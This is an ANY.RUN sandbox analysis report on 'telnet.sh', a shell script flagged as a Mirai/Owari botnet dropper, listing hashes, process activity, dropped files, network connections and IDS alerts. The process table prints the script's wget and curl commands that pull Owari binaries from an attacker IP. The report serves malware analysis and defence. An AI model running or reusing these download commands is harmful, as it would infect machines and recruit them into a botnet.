File name:

telnet.sh

Full analysis: https://app.any.run/tasks/d4740b4a-0c61-458f-b1d9-fe241f4585ee
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: February 27, 2025, 17:45:34
OS: Ubuntu 22.04.2 LTS
Tags:
opendir
mirai
botnet
Indicators:
MIME: text/x-shellscript
File info: Bourne-Again shell script, ASCII text executable
MD5:

CB40827174FBC19FB3485F4F9B9B3C34

SHA1:

BF7D6AEE38215393B73A34C461A8B08DF1D66268

SHA256:

DBC0366FFA6359D5C0E60FF24EA5B6B12D887E108151F904FF61479B302B17A5

SSDEEP:

24:vosRnSnsohQn0ko4frpnSKfJoYekYedHnhzlBoj+naYLoefznMUdksoNcnEkowkz:v5Ss9dxVSKxrHBXZ9LTzJFJ7XJpXnhV2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • wget (PID: 40723)

  • SUSPICIOUS

    • Executes commands using command-line interpreter

      • sudo (PID: 40678)

    • Modifies file or directory owner

      • sudo (PID: 40675)

    • Potential Corporate Privacy Violation

      • curl (PID: 40684)
      • wget (PID: 40767)
      • curl (PID: 40730)
      • wget (PID: 40723)
      • curl (PID: 40768)
      • curl (PID: 40852)
      • wget (PID: 40845)
      • wget (PID: 40883)
      • curl (PID: 40889)
      • wget (PID: 40682)
      • wget (PID: 40961)
      • wget (PID: 40999)
      • wget (PID: 40921)
      • curl (PID: 41003)
      • wget (PID: 41035)
      • curl (PID: 41041)
      • curl (PID: 40927)
      • curl (PID: 40965)

    • Connects to the server without a host name

      • curl (PID: 40730)
      • wget (PID: 40723)
      • curl (PID: 40768)
      • wget (PID: 40845)
      • wget (PID: 40806)
      • curl (PID: 40815)
      • wget (PID: 40921)
      • wget (PID: 40883)
      • curl (PID: 40927)
      • curl (PID: 40889)
      • wget (PID: 40682)
      • curl (PID: 40684)
      • wget (PID: 40767)
      • wget (PID: 40961)
      • curl (PID: 41003)
      • curl (PID: 40965)
      • wget (PID: 40999)
      • wget (PID: 41035)
      • curl (PID: 41041)
      • curl (PID: 40852)

    • Reads /proc/mounts (likely used to find writable filesystems)

      • curl (PID: 40768)
      • curl (PID: 40815)
      • curl (PID: 40852)
      • curl (PID: 40927)
      • curl (PID: 40889)
      • curl (PID: 41003)
      • curl (PID: 40965)
      • curl (PID: 41041)
      • dbus-daemon (PID: 41124)
      • fusermount3 (PID: 41140)
      • fusermount3 (PID: 41167)
      • dbus-daemon (PID: 41109)
      • gjs-console (PID: 41283)
      • gjs-console (PID: 41412)
      • gnome-shell (PID: 41197)
      • dbus-daemon (PID: 41228)

    • Connects to unusual port

      • SSH (PID: 40722)
      • SSH (PID: 40760)
      • SSH (PID: 40805)
      • SSH (PID: 40881)
      • SSH (PID: 40844)
      • SSH (PID: 40919)
      • SSH (PID: 40957)
      • SSH (PID: 40995)
      • SSH (PID: 41033)
      • SSH (PID: 41073)

    • Uses wget to download content

      • bash (PID: 40680)

    • Checks DMI information (probably VM detection)

      • pipewire (PID: 41099)
      • udevadm (PID: 41143)
      • pulseaudio (PID: 41101)
      • systemd-hostnamed (PID: 41360)
      • gnome-shell (PID: 41197)

    • Checks the user who created the process

      • systemd (PID: 41092)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
523
Monitored processes
299
Malicious processes
6
Suspicious processes
17

Behavior graph

Click at the process to see the details
start dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget systemctl no specs curl snap-seccomp no specs snap-confine no specs dumpe2fs no specs snap-update-ns no specs dumpe2fs no specs cat no specs chmod no specs ssh no specs ssh no specs ssh no specs ssh #MIRAI wget ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs bash no specs chmod no specs ssh no specs wget ssh no specs ssh no specs ssh ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs bash no specs chmod no specs ssh no specs wget ssh no specs ssh no specs ssh ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs bash no specs chmod no specs ssh no specs wget ssh no specs ssh no specs ssh ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs bash no specs chmod no specs ssh no specs wget ssh no specs ssh no specs ssh ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs bash no specs chmod no specs ssh no specs wget ssh no specs ssh no specs ssh ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs bash no specs chmod no specs ssh no specs wget ssh no specs ssh no specs ssh ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs bash no specs chmod no specs ssh no specs wget ssh no specs ssh no specs ssh ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs bash no specs chmod no specs ssh no specs wget ssh no specs ssh no specs ssh ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs bash no specs chmod no specs ssh no specs ssh no specs ssh no specs ssh ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs ssh no specs dash no specs gdm-session-worker no specs dash no specs dash no specs systemd-user-runtime-dir no specs systemd no specs systemd no specs systemd no specs 30-systemd-environment-d-generator no specs systemd no specs systemd-xdg-autostart-generator no specs systemctl no specs pipewire no specs pipewire-media-session no specs pulseaudio no specs snap-confine no specs tracker-extract-3 no specs dbus-daemon no specs gdm-wayland-session no specs snap-seccomp no specs dbus-run-session no specs gvfsd no specs dbus-daemon no specs gnome-session-binary no specs gvfsd no specs gvfsd-fuse no specs fusermount3 no specs udevadm no specs xdg-document-portal no specs gst-plugin-scanner no specs gst-plugin-scanner no specs xdg-permission-store no specs session-migration no specs fusermount3 no specs dash no specs gsettings no specs gsettings no specs snap-confine no specs snap-confine no specs snap-update-ns no specs python3.10 no specs python3.10 no specs dash no specs gsettings no specs gsettings no specs gnome-shell no specs tracker-miner-fs-3 no specs dbus-daemon no specs at-spi-bus-launcher no specs dbus-daemon no specs xwayland no specs gvfs-udisks2-volume-monitor no specs gvfs-mtp-volume-monitor no specs gvfs-gphoto2-volume-monitor no specs gvfs-goa-volume-monitor no specs dbus-daemon no specs goa-daemon no specs dbus-daemon no specs goa-identity-service no specs gvfs-afc-volume-monitor no specs systemd-localed no specs dbus-daemon no specs xdg-permission-store no specs geoclue no specs dbus-daemon no specs dbus-daemon no specs at-spi2-registryd no specs gjs-console no specs gsd-sharing no specs ibus-daemon no specs gsd-wacom no specs gsd-color no specs gsd-keyboard no specs python3.10 no specs gsd-print-notifications no specs gsd-rfkill no specs gsd-smartcard no specs gsd-datetime no specs gsd-media-keys no specs gsd-screensaver-proxy no specs gsd-sound no specs gsd-a11y-settings no specs gsd-housekeeping no specs gsd-power no specs systemd-hostnamed no specs dbus-daemon no specs false no specs ibus-engine-m17n no specs gsd-print-notifications no specs dash no specs gsd-printer no specs xkbcomp no specs fprintd no specs ibus-daemon no specs ibus-engine-mozc no specs dash no specs dbus-daemon no specs xkbcomp no specs python3.10 no specs gjs-console no specs ibus-engine-unikey no specs dbus-daemon no specs gvfsd no specs spice-vdagent no specs ibus-dconf no specs ibus-engine-m17n no specs dbus-daemon no specs ibus-portal no specs xbrlapi no specs ibus-engine-mozc no specs ibus-engine-unikey no specs ibus-dconf no specs ibus-daemon no specs ibus-x11 no specs dbus-daemon no specs ibus-portal no specs ibus-engine-simple no specs tracker-extract-3 no specs gvfsd-metadata no specs

Process information

PID
CMD
Path
Indicators
Parent process
40674/bin/sh -c "sudo chown user /home/user/Desktop/telnet\.sh && chmod +x /home/user/Desktop/telnet\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/telnet\.sh "/usr/bin/dashany-guest-agent
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40675sudo chown user /home/user/Desktop/telnet.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
40676chown user /home/user/Desktop/telnet.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
40677chmod +x /home/user/Desktop/telnet.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40678sudo -iu user /home/user/Desktop/telnet.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
40680/bin/bash /home/user/Desktop/telnet.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40681/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40682wget http://104.248.155.103/Binarys/Owari.x86/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40683systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service/usr/bin/systemctlsnapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
40684/snap/curl/1754/bin/curl -O http://104.248.155.103/Binarys/Owari.x86/snap/curl/1754/bin/curl
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
76
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
40682wget/tmp/Owari.x86binary
MD5:
SHA256:
40717cat/tmp/SSHbinary
MD5:
SHA256:
40723wget/tmp/Owari.mipsbinary
MD5:
SHA256:
40767wget/tmp/Owari.mpslbinary
MD5:
SHA256:
40845wget/tmp/Owari.arm5binary
MD5:
SHA256:
40883wget/tmp/Owari.arm6binary
MD5:
SHA256:
40921wget/tmp/Owari.arm7binary
MD5:
SHA256:
40961wget/tmp/Owari.ppcbinary
MD5:
SHA256:
40999wget/tmp/Owari.m68kbinary
MD5:
SHA256:
41035wget/tmp/Owari.sh4binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
40
TCP/UDP connections
170
DNS requests
12
Threats
51

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
185.125.190.49:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
91.189.91.48:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
185.125.190.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
40684
curl
GET
200
104.248.155.103:80
http://104.248.155.103/Binarys/Owari.x86
unknown
unknown
40682
wget
GET
200
104.248.155.103:80
http://104.248.155.103/Binarys/Owari.x86
unknown
unknown
40723
wget
GET
200
104.248.155.103:80
http://104.248.155.103/Binarys/Owari.mips
unknown
unknown
POST
200
185.125.188.59:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
binary
45.3 Kb
whitelisted
POST
200
185.125.188.58:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
binary
45.3 Kb
whitelisted
POST
200
185.125.188.59:443
https://api.snapcraft.io/api/v1/snaps/auth/nonces
unknown
binary
53 b
whitelisted
POST
200
185.125.188.58:443
https://api.snapcraft.io/api/v1/snaps/auth/sessions
unknown
binary
587 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
484
avahi-daemon
224.0.0.251:5353
unknown
91.189.91.48:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
185.125.190.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
185.125.190.49:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
37.19.194.81:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
212.102.56.179:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
169.150.255.183:443
odrs.gnome.org
GB
whitelisted
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
185.125.188.55:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::97
  • 2001:67c:1562::23
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::96
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2a
  • 2620:2d:4002:1::197
  • 185.125.190.49
  • 91.189.91.48
  • 91.189.91.96
  • 91.189.91.49
  • 91.189.91.98
  • 185.125.190.18
  • 185.125.190.97
  • 185.125.190.98
  • 185.125.190.96
  • 185.125.190.17
  • 91.189.91.97
  • 185.125.190.48
whitelisted
odrs.gnome.org
  • 37.19.194.81
  • 195.181.175.40
  • 169.150.255.180
  • 212.102.56.179
  • 169.150.255.183
  • 195.181.170.19
  • 207.211.211.26
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::19
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.54
  • 185.125.188.55
  • 185.125.188.58
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::6d
  • 2620:2d:4000:1010::42
whitelisted
google.com
  • 142.250.185.238
  • 2a00:1450:4001:813::200e
whitelisted
50.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
40682
wget
Potentially Bad Traffic
ET INFO x86 File Download Request from IP Address
40682
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .x86
40682
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
40684
curl
Potentially Bad Traffic
ET INFO x86 File Download Request from IP Address
40684
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
40684
curl
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .x86
40684
curl
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
40723
wget
A Network Trojan was detected
AV INFO Possible Mirai .mips Executable Download
40723
wget
Potentially Bad Traffic
ET INFO MIPS File Download Request from IP Address
40723
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
telnet.sh